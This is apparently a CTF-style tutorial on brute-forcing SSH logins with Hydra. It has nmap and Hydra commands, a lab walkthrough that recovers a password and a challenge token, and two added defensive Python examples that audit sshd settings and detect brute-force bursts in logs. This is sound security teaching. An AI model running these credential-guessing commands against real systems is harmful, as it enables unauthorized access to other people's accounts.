SSH Brute Force


Overview

Technique for gaining SSH access to a target by brute-forcing credentials using a wordlist. The primary tool covered here is Hydra, which supports parallelized login attempts across many protocols including SSH.


Workflow

  1. Identify SSH — confirm port 22 is open via Nmap
  2. Gather hints — probe the target for username clues (banner messages, wordlists, file names)
  3. Brute force — run Hydra with a known or discovered username against a wordlist
  4. Connect — use the recovered credentials to log in via SSH

Step 1 — Confirm SSH Is Available

nmap -sS -sV -p 22 TARGET_IP

# Or scan all ports to catch SSH on non-standard ports
nmap -sS -sV -p- TARGET_IP

Expected output when SSH is present:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9

Step 2 — Gather Username Hints

Before brute-forcing, try connecting with a dummy username. SSH banner messages sometimes reveal the expected username or other useful information:

ssh dummy@TARGET_IP

Example banner response:

This system is reserved only for john and friends. If you are not a friend, please leave!

Also look for hints on the attack host: custom wordlists named after a user, files referencing usernames, or challenge descriptions:

# Check for wordlists on the local machine
ls /usr/share/wordlists/

Step 3 — Brute Force with Hydra

Hydra Parameters Quick Reference

Option        Description
-l USERNAME   Single username
-L FILE       Username list from file
-p PASSWORD   Single password
-P FILE       Password list from file
-t N          Number of parallel tasks (default 16; use 4 for SSH)
-s PORT       Target port (default for SSH: 22)
-v            Verbose output
-V            Show each login attempt
-f            Stop after first valid credential found

Single Username, Wordlist Password Attack

# Basic run: one username, passwords taken from a wordlist
hydra -l USERNAME -P /path/to/wordlist.txt ssh://TARGET_IP

# Reduce parallel tasks to avoid SSH connection limits (recommended for SSH)
hydra -l USERNAME -P /path/to/wordlist.txt -t 4 ssh://TARGET_IP

# Specify port explicitly if SSH is on a non-standard port
hydra -l USERNAME -P /path/to/wordlist.txt -s PORT ssh://TARGET_IP

# Try multiple usernames from a file
hydra -L usernames.txt -P /path/to/wordlist.txt -t 4 ssh://TARGET_IP

Note

Many SSH servers limit the number of concurrent authentication attempts. Hydra will warn about this. Use -t 4 to reduce parallel tasks and avoid being rate-limited or locked out.
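
From the defender's side, the banner in Step 2 and the connection limits in the note above correspond to sshd settings that can be audited. The following Python check is an added example, not part of the original page; the sample `sshd -T` output, banner text, account list and the policy values `max_tries` and `max_unauth` are constructed assumptions.

```python
import re

# Constructed excerpt of `sshd -T` output (effective settings, lowercase keywords).
SAMPLE_SSHD_T = """\
port 22
passwordauthentication yes
permitrootlogin yes
maxauthtries 6
maxstartups 100:30:200
banner /etc/issue.net
"""
# Constructed banner file content, modelled on the banner quoted in Step 2.
SAMPLE_BANNER = "This system is reserved only for john and friends."
LOCAL_USERS = ["john", "root"]  # assumed list of local account names


def audit(sshd_t, banner_text, users, max_tries=3, max_unauth=10):
    """Return findings for settings that make password guessing easier.
    max_tries and max_unauth are assumed policy values for this example."""
    cfg = {}
    for line in sshd_t.splitlines():
        key, _, value = line.strip().partition(" ")
        if key:
            cfg[key.lower()] = value.strip()
    findings = []
    if cfg.get("passwordauthentication", "yes") == "yes":
        findings.append("passwordauthentication yes: passwords can be guessed; prefer keys")
    if cfg.get("permitrootlogin") == "yes":
        findings.append("permitrootlogin yes: root may authenticate with a password")
    tries = int(cfg.get("maxauthtries", "6"))
    if tries > max_tries:
        findings.append(f"maxauthtries {tries}: allows {tries} guesses per connection")
    # MaxStartups is "start:rate:full" or a single count of unauthenticated connections.
    start = int(cfg.get("maxstartups", "10:30:100").split(":")[0])
    if start > max_unauth:
        findings.append(f"maxstartups {start}: {start} unauthenticated connections before throttling")
    # A banner that names real accounts gives away half of each credential pair.
    leaked = [u for u in users if re.search(rf"\b{re.escape(u)}\b", banner_text, re.I)]
    if cfg.get("banner", "none") != "none" and leaked:
        findings.append("banner names local accounts: " + ", ".join(leaked))
    return findings
```

On a real host the first argument would be the output of `sshd -T` run as root, and the banner text would be read from the file the `banner` setting points to.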

Common Wordlists on Kali

/usr/share/wordlists/rockyou.txt          # General passwords — most common CTF choice
/usr/share/wordlists/metasploit/          # Metasploit-bundled wordlists
/usr/share/wordlists/john.lst             # John the Ripper default list
/usr/share/seclists/Passwords/            # SecLists password collections

Example Output

[DATA] attacking ssh://TARGET_IP:22/
[22][ssh] host: TARGET_IP   login: john   password: trustno1
1 of 1 target successfully completed, 1 valid password found

Step 4 — Connect with Recovered Credentials

ssh USERNAME@TARGET_IP

On first connection to an unknown host, SSH will ask you to confirm the host fingerprint:

The authenticity of host 'TARGET_IP' can't be established.
ED25519 key fingerprint is SHA256:xxxx...
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes

Type yes to add the host to ~/.ssh/known_hosts and proceed.


Full Example

Challenge

What is the user token found in the user's home folder in token.txt on Target 2?

  • Local Host IP address is 10.102.53.159.
  • Target 2 IP address is 10.102.62.88.

Port and Service Discovery

Run nmap to discover open ports and available services:

$ sudo nmap -sS -sV -p- 10.102.62.88
Starting Nmap 7.93 ( https://nmap.org ) at 2025-02-11 02:50 UTC
Nmap scan report for ip-10-102-62-88.eu-west-1.compute.internal (10.102.62.88)
Host is up (0.000014s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.84 seconds

It looks like SSH is available on the standard port 22.

Attempt Login With a Generic User

Attempting to log in with the username admin shows an interesting message.

$ ssh admin@10.102.62.88
The authenticity of host '10.102.62.88 (10.102.62.88)' can't be established.
ED25519 key fingerprint is SHA256:pHZzV4YBg+dZ9wT/hDzq3v2nJLdCVW3J+YoRUmFpaQk.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.102.62.88' (ED25519) to the list of known hosts.
This system is reserved only for john and friends. If you are not a friend, please leave!
admin@10.102.62.88's password:

Let's Look Around for Additional Information

There is a custom wordlist named john.lst:

$ ls -asl /usr/share/wordlists/john.lst 
4 -rw-r--r-- 1 root root 2077 Feb 11 02:48 /usr/share/wordlists/john.lst

Brute Force Attack

Let's use hydra to guess the SSH password for the username john:

$ hydra -l john -P /usr/share/wordlists/john.lst ssh://10.102.62.88
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-02-11 03:11:39
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 200 login tries (l:1/p:200), ~13 tries per task
[DATA] attacking ssh://10.102.62.88:22/
[22][ssh] host: 10.102.62.88   login: john   password: trustno1
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-02-11 03:11:53

We found the following credentials:

login: john   password: trustno1

Connect to Target System

Now that we found the credentials, let's connect and see what's available:

$ ssh john@10.102.62.88
This system is reserved only for john and friends. If you are not a friend, please leave!
john@10.102.62.88's password: 
Welcome to Ubuntu 20.04.4 LTS (GNU/Linux 5.10.223-212.873.amzn2.x86_64 x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage
john@linux-challenge-2:~$ ls -asl
total 16
0 drwxr-xr-x 1 john john   88 Feb 11 03:11 .
0 drwxr-xr-x 1 root root   18 Oct 12  2023 ..
4 -rw-r--r-- 1 john john  220 Feb 25  2020 .bash_logout
4 -rw-r--r-- 1 john john 3771 Feb 25  2020 .bashrc
0 drwx------ 2 john john   34 Feb 11 03:11 .cache
4 -rw-r--r-- 1 john john  807 Feb 25  2020 .profile
4 -rw-r--r-- 1 root root    7 Feb 11 02:48 token.txt
john@linux-challenge-2:~$ cat token.txt
b2d61a
john@linux-challenge-2:~$ 

Answer

The user token is b2d61a.
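
The Hydra run in this walkthrough leaves a recognisable pattern in the target's sshd log: a burst of failed passwords from one address, followed by an accepted one. The following detector is an added example, not part of the original page; the log lines are constructed (reusing the walkthrough's attacker address and hostname), and the threshold, window and year are assumed values.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sshd auth-log lines. 10.102.7.20 is a made-up legitimate client.
SAMPLE_LOG = """\
Feb 11 03:05:10 linux-challenge-2 sshd[1090]: Failed password for john from 10.102.7.20 port 51000 ssh2
Feb 11 03:05:18 linux-challenge-2 sshd[1090]: Accepted password for john from 10.102.7.20 port 51000 ssh2
Feb 11 03:11:40 linux-challenge-2 sshd[1201]: Failed password for john from 10.102.53.159 port 40112 ssh2
Feb 11 03:11:40 linux-challenge-2 sshd[1202]: Failed password for john from 10.102.53.159 port 40114 ssh2
Feb 11 03:11:41 linux-challenge-2 sshd[1203]: Failed password for john from 10.102.53.159 port 40116 ssh2
Feb 11 03:11:41 linux-challenge-2 sshd[1204]: Failed password for john from 10.102.53.159 port 40118 ssh2
Feb 11 03:11:43 linux-challenge-2 sshd[1205]: Failed password for john from 10.102.53.159 port 40120 ssh2
Feb 11 03:11:52 linux-challenge-2 sshd[1206]: Accepted password for john from 10.102.53.159 port 40122 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)

def detect(log_text, threshold=5, window=timedelta(seconds=60), year=2025):
    """Alert on a burst of failures per source IP and on a success that follows it."""
    recent = defaultdict(deque)  # ip -> timestamps of failures inside the window
    bursting = {}                # ip -> time of the latest failure in an active burst
    alerts = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        # Syslog timestamps carry no year, so an assumed one is supplied.
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        ip, user, q = m["ip"], m["user"], recent[m["ip"]]
        while q and ts - q[0] > window:
            q.popleft()
        if ip in bursting and ts - bursting[ip] > window:
            del bursting[ip]  # the burst ended; a later one alerts again
        if m["result"] == "Failed":
            q.append(ts)
            if len(q) >= threshold:
                if ip not in bursting:
                    alerts.append(("brute_force", ip, user, ts))
                bursting[ip] = ts
        elif ip in bursting:
            alerts.append(("success_after_brute_force", ip, user, ts))
    return alerts
```

The single mistyped password from 10.102.7.20 produces no alert, while the success after the burst from 10.102.53.159 is the event to treat as a likely account compromise.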
